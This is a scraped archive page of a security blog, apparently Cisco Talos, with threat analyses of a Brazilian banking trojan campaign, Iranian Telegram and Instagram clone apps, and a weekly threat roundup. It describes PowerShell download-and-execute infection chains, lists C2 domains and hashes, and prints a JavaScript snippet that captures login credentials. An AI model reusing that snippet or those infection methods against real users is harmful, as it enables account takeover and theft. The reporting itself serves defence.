  • a2d01ed549ffcdd8de59939e7fae64d1455309ab7b8cbbaa6aae8f626803319b
  • a692ae61c540f3138866e74cd98aab9b368fdfe36233ccc408549a69a5a2c86f
  • dca6675566e48fbab773ad8c64504b809f8323ca48a8771d0a80ad7ccea1a2de
  • eb6b88afe59ff4fe3068586f6eea31a174deb0956f9fc72df68394bb007aee05
  • ec383b84e5038f061921a2a41b27d8635465826bce5636b21ede0fe061895972
  • f3641ae9463763cac44325547c7a6aeb954e8cc09a4ddf739c8d068c443761c9
  • f49cfd859d0cde4b95fbb1cd277a2e0668ac8bdbbc5e215af7da159e108ac5cd
  • f99dd238a630895697be11c2a551a3874a315b6f5a7bf752ab06cab6eb69e7b9
  • ffe52a1f56588e88eef218987e89a4caade5125e3a4478cb38ce85ec7733e03c

Screenshots of DetectionAMP




Metamorfo Banking Trojan Keeps Its Sights on Brazil

Thu, 08/11/2018 - 15:09
This blog post was authored by Edmund Brumaghin, Warren Mercer, Paul Rascagneres, and Vitor Ventura.

Executive Summary
Financially motivated cybercriminals have used banking trojans for years to steal sensitive financial information from victims. They are often created to gather credit card information and login credentials for various online banking and financial services websites so this data can be monetized by the attackers. Cisco Talos recently identified two ongoing malware distribution campaigns being used to infect victims with banking trojans, specifically financial institutions' customers in Brazil. Additionally, during the analysis of these campaigns, Talos identified a dedicated spam botnet that is currently delivering malicious spam emails as part of the infection process.

Distribution campaigns
While analyzing these campaigns, Talos identified two separate infection processes that we believe attackers have used between late October and early November. These campaigns used different file types for the initial download and infection process, and ultimately delivered two separate banking trojans that target Brazilian financial institutions. Both campaigns used the same naming convention for various files used during the infection process and featured the abuse of link-shortening services to obscure the actual distribution servers used. The use of link shorteners also allows some additional flexibility. Many organizations allow their employees to access link shorteners from corporate environments, which could enable the attacker to shift where they are hosting malicious files, while also enabling them to leverage these legitimate services in email-based campaigns.

Campaign 1
Talos identified a spam campaign using a zipped file hosted on a free web hosting platform. This archive contains a Windows LNK file (Link). During this campaign, the filename followed the following format:

"," where "XXXXXXXXXX" is a 10-digit numeric value.

The LNK file format was:

"__Fatura pendente - XXXX.lnk," where "XXXX" is a four-digit alphanumeric value.

The purpose of the LNK file was to download a PowerShell script with an image filename extension (.bmp or .png):

The purpose of this command is to download and execute a PowerShell script from the attacker's URL. This new PowerShell script is also obfuscated:

This script is used to download an archive hosted on Amazon Web Services (AWS):


This archive contains two files:

  • A dynamic library (.DLL)
  • A compressed payload (.PRX)

The library decompresses the PRX file and executes it in a remote process (library injection). This injected code is the final payload described later in this post.
 Campaign 2
In addition to the infection process described in Campaign 1, Talos also observed a second series of campaigns that leveraged a different process to deliver and execute malware on victim systems. This campaign also appeared to target Portuguese-speaking victims.

In this series of campaigns, attackers leveraged malicious PE32 executables to perform the initial stage of the infection process rather than Windows shortcut files (LNK). These PE32 executables were delivered in ZIP archives using the following naming convention:

"," where "XXXXXXXXXX'" is a 10-digit numeric value.

A PE32 executable is inside of the ZIP archive. These executables used the following naming convention:

"__Fatura pendente - XXXX.exe," where "XXXX" is a four-digit alphanumeric value.

When executed, these PE32 files are used to create a batch file in a subdirectory of %TEMP%.

The Windows Command Processor is then used to execute the batch file which, in turn, executes PowerShell with the instructions to download the contents hosted on the attacker-controlled server and pass it to the Invoke-Expression (IEX) using the following syntax:

The batch file is then deleted and the infection process continues.

When the system reaches out to Bitly, the link shortener, to access the contents hosted at the shortened link destination, an HTTP redirection redirects the client to the attacker-controlled server hosting a PowerShell script that is passed into IEX and executed as previously described. The server delivers the following PowerShell:

This PowerShell script retrieves and executesthe malicious payload that is being delivered to the system. This PowerShell also leverages the Bitly service, as seen in the previous screenshot.

With Bitly links, users can obtain some further information by adding the "+" sign to the end of the shortened URL. By doing this, we discovered that the link was created on Oct. 21, most likely around the campaign start time, and the number of clicks that have been registered through the Bitly service, we identified 699 clicks so far.

While the HTTP request is made for a JPEG and the content type specified is "image/jpeg," the server actually delivers a ZIP archive containing a Windows DLL file called "b.dll."

The script then executes sleep mode for 10 seconds after which it extracts the archive and saves the DLL to a subdirectory of %APPDATA% on the system. RunDLL32 is then used to execute the malware, infecting the system. The uncompressed DLL is very large, approximately 366MB in size, due to the inclusion of a large number of 0x00 within the binary. This may have been used to evade automated detection and analysis systems, as many will not properly process large files. Similarly, this will avoid sandbox detonation, as most sandboxes will not allow files of this size.

Additionally, infected systems beacon to an attacker-controlled server (srv99[.]tk) during the infection process.

Analysis of the DNS communications associated with this domain shows an increase in attempts to resolve this domain, which corresponds with the campaigns that have been observed.

The majority of these resolution requests have occurred from systems located in Brazil.

The PowerShell execution also facilitates communications with a dynamic DNS service. Similarly to the first Bitly link, we were able to obtain additional information in relation to this domain:

We once again see a creation time, but this time, it's a few days later. This potentially shows the actor pivoting to a different email list to send the same spam information to.

Spam tools
Both of these campaigns eventually deliver a banking trojan. However, Talos identified additional tools and malware hosted on the Amazon S3 Bucket. This malware is a remote administration tool with the capability to create emails. The emails are created on the BOL Online email platform, an internet portal that provides email hosting and free email services in Brazil. The attacker's main goal appears to be creating a botnet of systems dedicated to email creation.

The malware is developed in C# and contains many Portuguese words.

Here is the function used to create a BOL email:

Once created, the randomly generated username and password are sent to a C2 server. BOL Online uses a CAPTCHA system to keep machines from creating emails. To bypass this protection, the malware author uses the Recaptcha API with the token provided from the C2 server:

During our investigation, all the created emails were prefixed by "financeir."

The trojan has the capability to clean itself, send created email credentials and restart, download and execute binaries provided by the C2 server.

Talos identified three C2 servers:

  • hxxp://criadoruol[.]site/
  • hxxp://jdm-tuning[.]ru/
  • hxxp://www[.]500csgo[.]ru/

We identified more than 700 compromised systems on the servers that are members of his botnet. The oldest machine was compromised on Oct. 23. This botnet created more than 4,000 unique emails on the BOL Online service using the the aforementioned technique. Some of these emails were used to initiate the spam campaigns we tracked as part of this research.

Given the filename patterns, the victimology along with the specific targeting aspect of both campaigns, Talos assesses with moderate confidence that both of these campaigns leveraged the same email generation tool we discovered on the actors open S3 Bucket. This shows a link between both campaigns to the same actor using the same toolset. Likely the actor attempted to use different delivery methods and email lists to deliver his malspam.

Final payload
We identified two different payloads deployed during these campaigns. The payloads are developed in Delphi and are banking trojans targeting Brazilian banks.

Fellow security firm FireEye already covered the first payload here. It gets information on the compromised system and exfiltrates the data to a C2 server. It also includes a keylogger, which is exactly the same as the keylogger we described in this post. When the user is logged into their bank's website, the malware can interact with them by showing a fake popup alleging to be from the bank. Here is an example that attempts to steal the user's CVV:

The second one has exactly the same features but is implemented differently. It mainly targets two=factor authentication by displaying fake popups to the user:

A keylogger then retrieves the information entered by the target.

The following financial services organizations are being targeted by this malware: Santander, Itaù, Banco do Brasil, Caixa, Sicredi, Bradesco, Safra, Sicoob, Banco da Amazonia, Banco do Nordeste, Banestes, Banrisul, Banco de Brasilia and Citi.

This strain of malware is prevalent throughout the world and is further proof that banking trojans remain popular. With this sample the attacker targets specific Brazilian banking institutions. This could suggest the attacker is from South America, where they could find it easier to use the obtained details and credentials to carry out illicit financial activities. We will continue to monitor financial crimeware activities throughout the threat landscape. This is not a sophisticated trojan, and most banking malware rarely is, but it's the latest example of how easy it can be for criminals steal from users by abusing spam to send their malicious payloads.This threat also shows the lengths that actors are going to in order to obtain additional emails to abuse, creating an automatic generation mechanism to get new emails for additional spam campaigns.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on

Indicators of Compromise (IOCs)
The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.

Campaign #1
Stage 1 Downloaders (LNK Shortcuts):

Stage 1 Downloaders Filenames (LNK Shortcuts):
_Fatura pendente - HCBF.lnk

Stage 2 URLs

Stage 2 Powershell

Stage 3 Archive

Stage 3 Loader

Stage 3 Compressed Payload

Stage 4 Final Payload

Campaign #2
Stage 1 PE32 Executables:

Stage 1 PE32 Filenames:
_Fatura pendente - QD95.exe
_Fatura pendente - QW2I.exe
_Fatura pendente - 9X3H.exe

Stage 1 Archive Filenames:

Stage 1 URLs:

Stage 1 Domains:

Stage 2 URLs:

Link Shorteners:

C2 Domains:

Spam tools
PE Sample:

C2 Servers:

Final Payload
PE Samples:

Persian Stalker pillages Iranian users of Instagram and Telegram

Mon, 05/11/2018 - 14:55
This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres, Vitor Ventura and with the contributions of Eric Kuhla.

State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.
Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.

Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." It is not malicious enough to be classified as malware, but is suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically fulfills its functions that are expected by the user (ex. send messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.
Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while targeting secure messaging apps. Some actors are also hijacking the device's BGP protocol. This technique redirects the traffic of all routers, without the device considering the original of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and is easily detectable, so the new routes won't be in place for very long.
Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran and their nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.
A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. This same rule applies to the cloned applications, installing applications from untrusted sources implies a certain degree of risk that the users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.
TacticsFunctionality enhancement applications (grey) and Cambridge Universal AcademyDescription of

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.
While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.Whois information for
The domain is registered with the [email protected] email address. This is the same email address used to registered other domains for the cloned Instagram and Telegram applications (see other sections below).
Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.
Partial list of the domains found
We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.
Certificate information
This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based off the low prevalence of those values in the SSL certificate, Talos associates this domain to the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.List of domains associated with the same IP address
Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "," and another in the organization field where it's identified as "andromeda," instead of andromedaa.
Certificate information
Description of Cambridge Universal Academy published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.

Google flagged the URL for phishing, which might be related to the fact that this site, along with, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.

Business model

All of the applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like, which sells the same kind of exposure.Price list (original HTML errors where kept, translation by
While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing highlights the benefits of using this service rather than others. marketing (translation by
It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.
Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.
The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.
Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.
Application examples
Follower Begir Instagram iOS application
The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.
First screen after logging in
The developer added some features such as virtual currency and Persian language support, among others.Certificate information
The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.
document.addEventListener('click', function() {
  try {
    var tu = document.querySelector('[name="username"]');
    var tp = document.querySelector('[name="password"]');
    var tpV = (typeof tp == 'undefined') ? '' : tp.value;
    var tuV = (typeof tu == 'undefined') ? '' : tu.value;
  } catch (err) {
    var tuV = '';
    var tpV = ''
  var bd = document.getElementsByTagName('body')[0].innerText;
  var messageToPost = {
    'pu': tuV,
    'pp': tpV,
    'bd': bd

The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.
During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1
SESSIONID: [redacted]
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:
POST /start/fl.php?apk=35&m=ios HTTP/1.1
Connection: close
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Accept: */*
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:
Instructions to trust the developer certificate
The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.
Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.
Application description (translation by Google Translate)
We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.
Most recent Ozvbegir certificate
Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.
Older versions certificate
Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.
Ozvbegir classes structure
In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.
Update check and reply
Just like the previous application, this one also checks for new versions by performing an HTTP request to the domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from, an Iranian Android application store.The domain is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and coincidently is the one with the ability to upgrade the application on mobile devices.The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.Phone number request
This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.
Sessions created on a single phone
The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
ADMIN: web
Connection: close
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)

We identified more than 1 million subscribers on the Telegram chanel who automatically joined when they first opened the application.
Channel information

Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.AseGram and BitGram on Google Play
Publisher information
Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.Application examples

The AseGram application is available on Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.AseGram certificate
This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.Set proxy code
Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.
The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.The application contacts three domains:, and, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at, an Iranian state-sanctioned Android application store.Advanced Telegram cafebazaar page (translation by Google translate)
It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find an legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.The application also contains code to use socks servers located in several countries, which can be used to circumvent the ban. However, during our research we have never seen these being used. On the other side, if the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.Fake websites
Spoofed Telegram Websites
The most straightforward approach to gain access to an end-user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.Fake Telegram login page
This domain was registered on July 25, 2017. Based on the tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — [email protected][.]com — used to register this domain, as well as other domains and its passive Domain Name Servers (pDNS) records suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears as though the website was built using the GitHub project called "Webogram," there were also strings in the source page to suggest this website's display was designed for iPhones.Source code reference
Newly identified Charming Kitten domains
While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," Which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same Modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.

This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.
BGP Routing Anomalies
While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcement, Talos noticed some routing anomalies originating from an Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271, as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows for internet communications to occur when requesting a resource located outside of the requested network or autonomous system.
BGP is used across the internet to assist with the selection of the best path routing. It's important to note this can be manipulated at ISP levels depending on various factors, which BGP allows for route selection. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:
The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no mechanism for security other than some methods like MD5 passwords for neighbours, IPSec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route. This could result in some traffic passing through a predetermined, or sub-optimal route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. BGP hijacking sessions' effectiveness are measured based on the number of BGP peers who receive the update through messages. The more peers who receive the update message, the more likely traffic is being routed through the alternative sub-optimal path, that is pre-configured by the actor.
Pre-Planned Routing Activity from ASN 58224
One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.
This range potentially being hijacked was associated with Hungarian-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, this could have been a trial run for a larger BGP hijack attempt.
There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. When routers received this update message through the speaking system, they began routing some traffic destined to the Telegram servers through the ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.

How BGP Hijacking could have enabled computer network operationsTheoretically, this announcement could have one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as documented by other security researchers, two months prior in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been open-source reporting that suggests that Iran- based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with Telegram SMS verification codes needed to gain access to Telegram accounts.
This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.
The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.
The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found that there are several Telegram clones with several thousands installations that somehow contact IP addresses located in Iran, some of them that advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users' devices.
The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, are still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was the citizenship, it is understandable that the vast majority of any country's population won't be as cybersecurity educated as a cybersecurity professional, so even this classic technique could be highly effective.
While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assess with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, to route two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment statement also considers open-source reporting on Iran's complicated history with Telegram from passing laws banning the use of Telegram, to reports of outages resulting from Telegram's IP addresses being blocked in Iran.
Aside from the victims and the applications, Talos was unable to find any solid link between each of these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, being with or without state sponsorship. Talos assesses with high confidence that the users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.
Xn--oogle-v1a[.]ga (ġoogle[.]ga)

Hash values8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk

Threat Roundup for Oct. 26 to Nov. 2

Fri, 02/11/2018 - 16:03

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 26 and Nov. 02. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Zbot-6732674-0
    Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
  • Win.Malware.Sivis-6734391-0
    Sivis is a type of trojan that is usually downloaded from the internet and installed by unsuspecting users. This trojan variant also includes sandbox evasion logic. It has the ability to move numerous files to the Recycle Bin.
  • Win.Malware.Explorerhijack-6734396-0
    A hijacker could use this malware to change the user's browser's home page, redirect the user to suspicious websites, and then lead them to advertisements and commercial content that generates pay-per-click revenue for its developers.
  • Xls.Malware.Cwsp-6735643-0
    This is an Excel-based downloader that uses PowerShell to retrieve the next stage of the malware executable. Microsoft Office displays a warning to the user before the payload actually gets activated.
  • Win.Trojan.Mikey-6735890-0
    This cluster focuses on malware that creates a specific cluster so the malware can achieve persistence. The samples have anti-analysis tricks to complicate the analysis. This family is known for the plugin architecture and for the intense network activity. This week, Mikey used the AppWizard packaging system. It is based on common Microsoft code, using the Microsoft Foundation Classes (MFC) to start a simple application. Malicious programs use this packer to stage process hollowing and obfuscate the malicious code.
Indicators of Compromise
Registry Keys
  • <HKLM>\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon
    • Value Name: userinit
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\ntos.exe
File Hashes
  • 0105bb0a81ceb78f84de07f7336a6ecdd95721545b3e47c96ae45f94a8fe8506
  • 0114885e69a066a72f12eb475c9ae36e0851309ce6902a547dd60915ab785523
